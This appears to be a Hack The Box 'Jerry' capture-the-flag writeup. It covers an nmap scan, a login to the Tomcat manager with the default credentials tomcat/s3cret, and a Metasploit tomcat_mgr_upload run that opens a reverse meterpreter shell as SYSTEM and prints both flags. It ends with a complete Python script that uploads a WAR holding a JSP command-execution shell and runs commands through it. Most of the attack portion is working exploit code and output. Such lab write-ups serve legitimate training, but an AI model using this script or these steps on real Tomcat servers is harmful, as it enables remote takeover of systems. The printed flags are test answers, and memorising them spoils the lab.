Port 8080 is exposed

Only one of the top-100 ports answers, and it is Tomcat 7.0.88 behind the Coyote connector. The OS fingerprint is unreliable because -T5 was used and no closed port was found, but the service banner is all that matters here.

# nmap -A -n -F -T5 jerry.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 14:08 UTC
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.050s latency).
Not shown: 99 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Network Distance: 2 hops
Browsing to port 8080

Clicking [Manager App] brings up an HTTP Basic auth prompt; after a few wrong passwords the server answers with a 403 page. Tomcat's stock 403 page for the manager app includes an example tomcat-users.xml entry showing how to grant the manager-gui role, and the credentials in that example had been used unchanged on this host.
The following ID and password from that page logged into [Manager App]:
ID:tomcat
PW:s3cret
Attacking from the tomcat account

A reverse shell was uploaded through the Manager App and the flags were retrieved. With a valid manager-gui account, exploit/multi/http/tomcat_mgr_upload does the whole deploy-execute-undeploy cycle against /manager/html. The "Handler failed to bind" line is harmless here: the module fell back to listening on 0.0.0.0:4444 while the payload still connected back to LHOST. Because the Tomcat service runs as LocalSystem, the deployed JSP already executes as NT AUTHORITY\SYSTEM, so no privilege escalation is needed and both user.txt and root.txt, stored together in one file on the Administrator's desktop, can be read straight away.
msf5 exploit(windows/http/cayin_xpost_sql_rce) > search tomcat

Matching Modules
================

   #   Name                                                          Disclosure Date  Rank       Check  Description
   -   ----                                                          ---------------  ----       -----  -----------
   0   auxiliary/admin/http/ibm_drm_download                         2020-04-21       normal     Yes    IBM Data Risk Manager Arbitrary File Download
   1   auxiliary/admin/http/tomcat_administration                                     normal     No     Tomcat Administration Tool Default Access
   2   auxiliary/admin/http/tomcat_utf8_traversal                    2009-01-09       normal     No     Tomcat UTF-8 Directory Traversal Vulnerability
   3   auxiliary/admin/http/trendmicro_dlp_traversal                 2009-01-09       normal     No     TrendMicro Data Loss Prevention 5.5 Directory Traversal
   4   auxiliary/dos/http/apache_commons_fileupload_dos              2014-02-06       normal     No     Apache Commons FileUpload and Apache Tomcat DoS
   5   auxiliary/dos/http/apache_tomcat_transfer_encoding            2010-07-09       normal     No     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   6   auxiliary/dos/http/hashcollision_dos                          2011-12-28       normal     No     Hashtable Collisions
   7   auxiliary/scanner/http/tomcat_enum                                             normal     No     Apache Tomcat User Enumeration
   8   auxiliary/scanner/http/tomcat_mgr_login                                        normal     No     Tomcat Application Manager Login Utility
   9   exploit/linux/http/cisco_prime_inf_rce                        2018-10-04       excellent  Yes    Cisco Prime Infrastructure Unauthenticated Remote Code Execution
   10  exploit/linux/http/cpi_tararchive_upload                      2019-05-15       excellent  Yes    Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
   11  exploit/multi/http/cisco_dcnm_upload_2019                     2019-06-26       excellent  Yes    Cisco Data Center Network Manager Unauthenticated Remote Code Execution
   12  exploit/multi/http/struts2_namespace_ognl                     2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   13  exploit/multi/http/struts_code_exec_classloader               2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   14  exploit/multi/http/struts_dev_mode                            2012-01-06       excellent  Yes    Apache Struts 2 Developer Mode OGNL Execution
   15  exploit/multi/http/tomcat_jsp_upload_bypass                   2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass
   16  exploit/multi/http/tomcat_mgr_deploy                          2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution
   17  exploit/multi/http/tomcat_mgr_upload                          2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution
   18  exploit/multi/http/zenworks_configuration_management_upload   2015-04-07       excellent  Yes    Novell ZENworks Configuration Management Arbitrary File Upload
   19  exploit/windows/http/cayin_xpost_sql_rce                      2020-06-04       excellent  Yes    Cayin xPost wayfinder_seqid SQLi to RCE
   20  exploit/windows/http/tomcat_cgi_cmdlineargs                   2019-04-10       excellent  Yes    Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
   21  post/multi/gather/tomcat_gather                                                normal     No     Gather Tomcat Credentials
   22  post/windows/gather/enum_tomcat                                                normal     No     Windows Gather Apache Tomcat Enumeration

Interact with a module by name or index, for example use 22 or use post/windows/gather/enum_tomcat

msf5 exploit(windows/http/cayin_xpost_sql_rce) > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf5 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.17.0.2       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
HttpPassword => s3cret
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS jerry.htb
RHOSTS => jerry.htb
msf5 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
msf5 exploit(multi/http/tomcat_mgr_upload) > set LHOST 10.10.14.7
LHOST => 10.10.14.7
msf5 exploit(multi/http/tomcat_mgr_upload) > exploit

[-] Handler failed to bind to 10.10.14.7:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying heHP934kTwG31cQvov...
[*] Executing heHP934kTwG31cQvov...
[*] Sending stage (53944 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:53072) at 2020-08-16 15:28:45 +0000
[*] Undeploying heHP934kTwG31cQvov ...

meterpreter > getuid
Server username: JERRY$
meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
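The three Metasploit log lines "Retrieving session ID and CSRF token", "Uploading and deploying" and "Executing" hide what the module actually sends to /manager/html. The script below, an added example written for this writeup and not code from the original post or from Metasploit, reproduces that flow by hand with the Python standard library: authenticate with HTTP Basic auth, take the CSRF nonce that Tomcat's CsrfPreventionFilter embeds in the manager page, POST a WAR through the HTML "deployWar" upload form, then call the JSP inside it. Host, port and credentials are the ones from this page; the JSP command page, the context name "probe" and the helper names are this example's own assumptions.

```python
"""Manual re-creation of what exploit/multi/http/tomcat_mgr_upload does:
authenticate to /manager/html, pull the CSRF nonce out of the page, POST a
WAR through the HTML upload form, then call the JSP it contains.
Added example for this writeup; the JSP, the helper names and the "probe"
context are assumptions, host/port/credentials come from the page."""
import base64
import io
import re
import urllib.parse
import urllib.request
import uuid
import zipfile

# Tiny JSP command page: GET /<ctx>/cmd.jsp?cmd=whoami runs the command and returns its stdout.
CMD_JSP = r"""<%@ page import="java.io.*" %><%
String c = request.getParameter("cmd");
if (c != null) {
    Process p = Runtime.getRuntime().exec(c);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String l;
    while ((l = r.readLine()) != null) { out.println(l); }
}
%>"""

# The manager's CSRF filter appends this nonce to every link and form action it renders.
NONCE_RE = re.compile(r"org\.apache\.catalina\.filters\.CSRF_NONCE=([0-9A-Fa-f]+)")


def build_war(jsp_source, jsp_name="cmd.jsp"):
    """Build a WAR in memory: the JSP plus an empty WEB-INF/web.xml so Tomcat deploys it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr(jsp_name, jsp_source)
        war.writestr("WEB-INF/web.xml",
                     '<?xml version="1.0" encoding="UTF-8"?>\n'
                     '<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0"/>\n')
    return buf.getvalue()


def war_contents(war_bytes):
    """Read a WAR back as {member name: bytes}; used to sanity-check build_war()."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return {name: war.read(name) for name in war.namelist()}


def extract_csrf_nonce(manager_html):
    """Return the first CSRF nonce found in the manager page, or None if absent."""
    m = NONCE_RE.search(manager_html)
    return m.group(1) if m else None


def multipart_body(field, filename, data, boundary):
    """Hand-rolled multipart/form-data body; urllib has no file-upload helper."""
    head = ("--%s\r\n"
            'Content-Disposition: form-data; name="%s"; filename="%s"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n" % (boundary, field, filename)).encode()
    tail = ("\r\n--%s--\r\n" % boundary).encode()
    return head + data + tail


def deploy_and_run(host, port, user, password, ctx, cmd):
    """Deploy CMD_JSP as /<ctx> via the manager HTML interface and run one command."""
    base = "http://%s:%d" % (host, port)
    auth = "Basic " + base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    # Cookie jar: the nonce is bound to the JSESSIONID issued in step 1, so both must travel together.
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
    # 1. Authenticate and fetch the manager page to obtain a session and its CSRF nonce.
    req = urllib.request.Request(base + "/manager/html", headers={"Authorization": auth})
    html = opener.open(req).read().decode("utf-8", "replace")
    nonce = extract_csrf_nonce(html)
    if nonce is None:
        raise RuntimeError("no CSRF nonce in manager page (does the account have manager-gui?)")
    # 2. POST the WAR through the "WAR file to deploy" form; the filename becomes the context path.
    boundary = uuid.uuid4().hex
    body = multipart_body("deployWar", ctx + ".war", build_war(CMD_JSP), boundary)
    req = urllib.request.Request(
        base + "/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=" + nonce,
        data=body, method="POST",
        headers={"Authorization": auth,
                 "Content-Type": "multipart/form-data; boundary=" + boundary})
    opener.open(req).read()
    # 3. Call the JSP. On Jerry the page's shell showed "nt authority\system" for whoami.
    req = urllib.request.Request("%s/%s/cmd.jsp?cmd=%s" % (base, ctx, urllib.parse.quote(cmd)))
    return opener.open(req).read().decode("utf-8", "replace").strip()


if __name__ == "__main__":
    print(deploy_and_run("jerry.htb", 8080, "tomcat", "s3cret", "probe", "whoami"))
```

Two things worth knowing when doing this by hand. The HTML interface only needs the manager-gui role, which is exactly what the example tomcat-users.xml entry grants; if the account also had manager-script, a single PUT of the WAR body to /manager/text/deploy?path=/probe would do with no session or nonce. And unlike the Metasploit module, this script leaves the application deployed: remove it afterwards with a POST to /manager/html/undeploy?path=/probe carrying the same nonce, or through the Manager App's Undeploy button.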